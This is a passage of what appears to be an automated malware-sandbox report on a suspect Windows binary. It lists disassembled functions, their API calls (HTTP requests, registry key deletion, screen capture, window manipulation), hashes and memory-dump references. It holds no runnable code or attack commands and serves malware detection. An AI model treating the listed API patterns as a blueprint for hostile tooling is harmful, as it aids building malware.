                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                        • API String ID: 221274066-3440237614
                        • Opcode ID: 5b35d1d6f7066a145b5a70c5bb20d2d85e020557280c5ce99d2121e60f87c986
                        • Instruction ID: 9656e9119cb0efa76f4c340de36e0f45c807c2fa86e24849d55f6a9ce77f1f65
                        • Opcode Fuzzy Hash: 5b35d1d6f7066a145b5a70c5bb20d2d85e020557280c5ce99d2121e60f87c986
                        • Instruction Fuzzy Hash: 52614A71108301AFD701EFA4DC85EAFBBE9EFC9750F04492DF5A5962A0DB309A49CB52
                        Function 009FC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                        Download Yara Rule
                        APIs
                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009FC4B0
                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 009FC4C3
                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 009FC4D7
                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 009FC4F0
                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 009FC533
                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 009FC549
                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009FC554
                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009FC584
                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 009FC5DC
                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 009FC5F0
                        • InternetCloseHandle.WININET(00000000), ref: 009FC5FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                        • String ID:
                        • API String ID: 3800310941-3916222277
                        • Opcode ID: fe2d3f8453470980b1919ae4b9dca7311e59746fc061c510e2be41e7f0ad22ee
                        • Instruction ID: 32d37b9c6c46165efe6514c14b262a84ad5f2cbecbc4c76b1642f188a949e90f
                        • Opcode Fuzzy Hash: fe2d3f8453470980b1919ae4b9dca7311e59746fc061c510e2be41e7f0ad22ee
                        • Instruction Fuzzy Hash: BC5159B154430DBFDB21DFA0CA88ABB7BBCFB08754F04841AFA4596250DB74E945DBA0
                        Function 00A1856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00A18592
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00A185A2
                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00A185AD
                        • CloseHandle.KERNEL32(00000000), ref: 00A185BA
                        • GlobalLock.KERNEL32(00000000), ref: 00A185C8
                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00A185D7
                        • GlobalUnlock.KERNEL32(00000000), ref: 00A185E0
                        • CloseHandle.KERNEL32(00000000), ref: 00A185E7
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00A185F8
                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00A1FC38,?), ref: 00A18611
                        • GlobalFree.KERNEL32(00000000), ref: 00A18621
                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 00A18641
                        • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00A18671
                        • DeleteObject.GDI32(00000000), ref: 00A18699
                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00A186AF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                        • String ID:
                        • API String ID: 3840717409-0
                        • Opcode ID: a6a042a4681765429c23574eee500d7cb789e59addf4451b90848477d319d7ac
                        • Instruction ID: 13a71b7f46799832af5cf0a4d23f399fd326185a6909ddb5b41a7f753f9a0458
                        • Opcode Fuzzy Hash: a6a042a4681765429c23574eee500d7cb789e59addf4451b90848477d319d7ac
                        • Instruction Fuzzy Hash: 6E412975640204BFDB11DFA5CC48EEA7BBDEF89761F108058F915EB260DB349942CB60
                        Function 009F14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                        Download Yara Rule
                        APIs
                        • VariantInit.OLEAUT32(00000000), ref: 009F1502
                        • VariantCopy.OLEAUT32(?,?), ref: 009F150B
                        • VariantClear.OLEAUT32(?), ref: 009F1517
                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 009F15FB
                        • VarR8FromDec.OLEAUT32(?,?), ref: 009F1657
                        • VariantInit.OLEAUT32(?), ref: 009F1708
                        • SysFreeString.OLEAUT32(?), ref: 009F178C
                        • VariantClear.OLEAUT32(?), ref: 009F17D8
                        • VariantClear.OLEAUT32(?), ref: 009F17E7
                        • VariantInit.OLEAUT32(00000000), ref: 009F1823
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                        • API String ID: 1234038744-3931177956
                        • Opcode ID: 457d8f919a559514232bca71dd0de407e2ddacf0268e2c38d97df252424457d3
                        • Instruction ID: 680e6635f9b96e37847236bd4dd588cfce770bf9a7184c2095f8532fab5e4fbb
                        • Opcode Fuzzy Hash: 457d8f919a559514232bca71dd0de407e2ddacf0268e2c38d97df252424457d3
                        • Instruction Fuzzy Hash: 90D1F031A04119EBDF04AF65E884BBDB7B6BF84700F148456FA46AB680DB34DC41DBE1
                        Function 00A0B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                          • Part of subcall function 00A0C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A0B6AE,?,?), ref: 00A0C9B5
                          • Part of subcall function 00A0C998: _wcslen.LIBCMT ref: 00A0C9F1
                          • Part of subcall function 00A0C998: _wcslen.LIBCMT ref: 00A0CA68
                          • Part of subcall function 00A0C998: _wcslen.LIBCMT ref: 00A0CA9E
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A0B6F4
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A0B772
                        • RegDeleteValueW.ADVAPI32(?,?), ref: 00A0B80A
                        • RegCloseKey.ADVAPI32(?), ref: 00A0B87E
                        • RegCloseKey.ADVAPI32(?), ref: 00A0B89C
                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00A0B8F2
                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A0B904
                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00A0B922
                        • FreeLibrary.KERNEL32(00000000), ref: 00A0B983
                        • RegCloseKey.ADVAPI32(00000000), ref: 00A0B994
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                        • String ID: RegDeleteKeyExW$advapi32.dll
                        • API String ID: 146587525-4033151799
                        • Opcode ID: b47834a187a79b69e14ebab38fb8e0af2faa30dac717f94934f034e8aea782e6
                        • Instruction ID: a1e8665b3091694670089d61fcf8b32fffeac5c967a36f1b2475cf32d76e1f53
                        • Opcode Fuzzy Hash: b47834a187a79b69e14ebab38fb8e0af2faa30dac717f94934f034e8aea782e6
                        • Instruction Fuzzy Hash: 7AC19B30218205AFD710DF24D594F2ABBE5BF84358F14859CF59A8B3A2CB71EC46CBA1
                        Function 00A0255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetDC.USER32(00000000), ref: 00A025D8
                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00A025E8
                        • CreateCompatibleDC.GDI32(?), ref: 00A025F4
                        • SelectObject.GDI32(00000000,?), ref: 00A02601
                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00A0266D
                        • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00A026AC
                        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00A026D0
                        • SelectObject.GDI32(?,?), ref: 00A026D8
                        • DeleteObject.GDI32(?), ref: 00A026E1
                        • DeleteDC.GDI32(?), ref: 00A026E8
                        • ReleaseDC.USER32(00000000,?), ref: 00A026F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                        • String ID: (
                        • API String ID: 2598888154-3887548279
                        • Opcode ID: 52e8e536bb3555b06d71f351a6fb3b2edcd82de5d50c85f0d72c2db24bf39c36
                        • Instruction ID: 4c4a628ea9b7042192d51e11704f1b6dea1892a8458bdc97997c443dd9968cee
                        • Opcode Fuzzy Hash: 52e8e536bb3555b06d71f351a6fb3b2edcd82de5d50c85f0d72c2db24bf39c36
                        • Instruction Fuzzy Hash: DE61E275D00219EFCF14CFE8D988AAEBBB6FF48310F208529E955A7250E771A941CF50
                        Function 009BDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • ___free_lconv_mon.LIBCMT ref: 009BDAA1
                          • Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD659
                          • Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD66B
                          • Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD67D
                          • Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD68F
                          • Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD6A1
                          • Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD6B3
                          • Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD6C5
                          • Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD6D7
                          • Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD6E9
                          • Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD6FB
                          • Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD70D
                          • Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD71F
                          • Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD731
                        • _free.LIBCMT ref: 009BDA96
                          • Part of subcall function 009B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000), ref: 009B29DE
                          • Part of subcall function 009B29C8: GetLastError.KERNEL32(00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000,00000000), ref: 009B29F0
                        • _free.LIBCMT ref: 009BDAB8
                        • _free.LIBCMT ref: 009BDACD
                        • _free.LIBCMT ref: 009BDAD8
                        • _free.LIBCMT ref: 009BDAFA
                        • _free.LIBCMT ref: 009BDB0D
                        • _free.LIBCMT ref: 009BDB1B
                        • _free.LIBCMT ref: 009BDB26
                        • _free.LIBCMT ref: 009BDB5E
                        • _free.LIBCMT ref: 009BDB65
                        • _free.LIBCMT ref: 009BDB82
                        • _free.LIBCMT ref: 009BDB9A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                        • String ID:
                        • API String ID: 161543041-0
                        • Opcode ID: a317ce12611cf11754fb6e57a495fecab39fe389f34513ed2e12ab850713c4e2
                        • Instruction ID: 30ec507caf4286e6a812f6faa8bf419d3f154f90d269ce75b92ea83dcb285219
                        • Opcode Fuzzy Hash: a317ce12611cf11754fb6e57a495fecab39fe389f34513ed2e12ab850713c4e2
                        • Instruction Fuzzy Hash: 72312831606605AFEB21AB79EA45BDAB7EDFF40330F154829E449D7191EF31ED808B24
                        Function 009E365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetClassNameW.USER32(?,?,00000100), ref: 009E369C
                        • _wcslen.LIBCMT ref: 009E36A7
                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 009E3797
                        • GetClassNameW.USER32(?,?,00000400), ref: 009E380C
                        • GetDlgCtrlID.USER32(?), ref: 009E385D
                        • GetWindowRect.USER32(?,?), ref: 009E3882
                        • GetParent.USER32(?), ref: 009E38A0
                        • ScreenToClient.USER32(00000000), ref: 009E38A7
                        • GetClassNameW.USER32(?,?,00000100), ref: 009E3921
                        • GetWindowTextW.USER32(?,?,00000400), ref: 009E395D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                        • String ID: %s%u
                        • API String ID: 4010501982-679674701
                        • Opcode ID: 69b3520d5898499c3210b86e7a1ad2ce2e8ec701888e630b58455f1618aac3e6
                        • Instruction ID: ac6b6350fa0353cd7f3029b71a034a40ff210fa460c7a078e45cf53fcbb8de42
                        • Opcode Fuzzy Hash: 69b3520d5898499c3210b86e7a1ad2ce2e8ec701888e630b58455f1618aac3e6
                        • Instruction Fuzzy Hash: 3A91A071204646EFD71ADF66C889BAAB7A8FF44350F00C529F9A9C3191DB30EE45CB91
                        Function 009E4954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                        Download Yara Rule
                        APIs
                        • GetClassNameW.USER32(?,?,00000400), ref: 009E4994
                        • GetWindowTextW.USER32(?,?,00000400), ref: 009E49DA
                        • _wcslen.LIBCMT ref: 009E49EB
                        • CharUpperBuffW.USER32(?,00000000), ref: 009E49F7
                        • _wcsstr.LIBVCRUNTIME ref: 009E4A2C
                        • GetClassNameW.USER32(00000018,?,00000400), ref: 009E4A64
                        • GetWindowTextW.USER32(?,?,00000400), ref: 009E4A9D
                        • GetClassNameW.USER32(00000018,?,00000400), ref: 009E4AE6
                        • GetClassNameW.USER32(?,?,00000400), ref: 009E4B20
                        • GetWindowRect.USER32(?,?), ref: 009E4B8B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                        • String ID: ThumbnailClass
                        • API String ID: 1311036022-1241985126
                        • Opcode ID: 2ee9fa015cb92a49bb2446fcb8470ff7d200352234872dbcdede52d914476d5f
                        • Instruction ID: d9cf090dc9a01967350dce8eaa3b0c120a16262f2536d0d4a5665ac4becef344
                        • Opcode Fuzzy Hash: 2ee9fa015cb92a49bb2446fcb8470ff7d200352234872dbcdede52d914476d5f
                        • Instruction Fuzzy Hash: CA91ED310083459FDB06CF16C885BAA77ECFF84324F088469FD859A196EB34ED46CBA1
                        Function 00A0CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00A0CC64
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00A0CC8D
                        • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00A0CD48
                          • Part of subcall function 00A0CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00A0CCAA
                          • Part of subcall function 00A0CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00A0CCBD
                          • Part of subcall function 00A0CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A0CCCF
                          • Part of subcall function 00A0CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00A0CD05
                          • Part of subcall function 00A0CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00A0CD28
                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00A0CCF3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                        • String ID: RegDeleteKeyExW$advapi32.dll
                        • API String ID: 2734957052-4033151799
                        • Opcode ID: fa36f555cef2d3761ad55585947289892d9ccbdf7a30991991d1c78f30ec6858
                        • Instruction ID: 09200a48c1ae507b35f717ebc0c67e0cefd250f035aa41f6a8fa759bc9503a03
                        • Opcode Fuzzy Hash: fa36f555cef2d3761ad55585947289892d9ccbdf7a30991991d1c78f30ec6858
                        • Instruction Fuzzy Hash: 6931607194112DBBD720CB94EC88EFFBB7CEF45760F004265A905E3190D7349E469AA0
                        Function 009F3D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                        Download Yara Rule
                        APIs
                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 009F3D40
                        • _wcslen.LIBCMT ref: 009F3D6D
                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 009F3D9D
                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 009F3DBE
                        • RemoveDirectoryW.KERNEL32(?), ref: 009F3DCE
                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 009F3E55
                        • CloseHandle.KERNEL32(00000000), ref: 009F3E60
                        • CloseHandle.KERNEL32(00000000), ref: 009F3E6B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                        • String ID: :$\$\??\%s
                        • API String ID: 1149970189-3457252023
                        • Opcode ID: 3b5bb0d1b18dfdd2b203b8fd284ee1b3517eb4ebbdd3462030a43f69242c3b62
                        • Instruction ID: 4f963ac921f70756502b45fb12b67b205c3c2b0c1134f0c336227e79dcf82015
                        • Opcode Fuzzy Hash: 3b5bb0d1b18dfdd2b203b8fd284ee1b3517eb4ebbdd3462030a43f69242c3b62
                        • Instruction Fuzzy Hash: FC31CF72940219ABDB20DBA0DC49FEF77BCEF89750F1080A5FA09D60A0EB7497458B64
                        Function 009EE6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • timeGetTime.WINMM ref: 009EE6B4
                          • Part of subcall function 0099E551: timeGetTime.WINMM(?,?,009EE6D4), ref: 0099E555
                        • Sleep.KERNEL32(0000000A), ref: 009EE6E1
                        • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 009EE705
                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 009EE727
                        • SetActiveWindow.USER32 ref: 009EE746
                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 009EE754
                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 009EE773
                        • Sleep.KERNEL32(000000FA), ref: 009EE77E
                        • IsWindow.USER32 ref: 009EE78A
                        • EndDialog.USER32(00000000), ref: 009EE79B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                        • String ID: BUTTON
                        • API String ID: 1194449130-3405671355
                        • Opcode ID: 4b1e03946bb45c43720d473f67c9f6c1df30f699a61b5cd0b5ffc6d15a3ce8fe
                        • Instruction ID: 4eaff46b1ed4e9f13dfe662e866520048c55eeee75e634979631e1d819b6d0c7
                        • Opcode Fuzzy Hash: 4b1e03946bb45c43720d473f67c9f6c1df30f699a61b5cd0b5ffc6d15a3ce8fe
                        • Instruction Fuzzy Hash: A12196B0280385AFEB02DFE1EC89B753B6EF75576AF105434F415825A1DB769C028B15
                        Function 009EE9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 009EEA5D
                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 009EEA73
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009EEA84
                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 009EEA96
                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 009EEAA7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
